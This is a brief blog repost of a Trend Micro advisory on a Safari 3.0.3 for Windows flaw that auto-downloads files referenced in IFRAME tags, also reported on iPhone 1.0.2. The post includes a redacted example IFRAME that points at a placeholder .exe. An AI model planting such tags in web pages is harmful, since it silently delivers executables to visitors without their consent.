Zero-day Flaw in Safari 3.0.03 Web Browser for Windows

From Trend Micro:

A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”

The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

Additional information provided by Leander Yu.

No comments: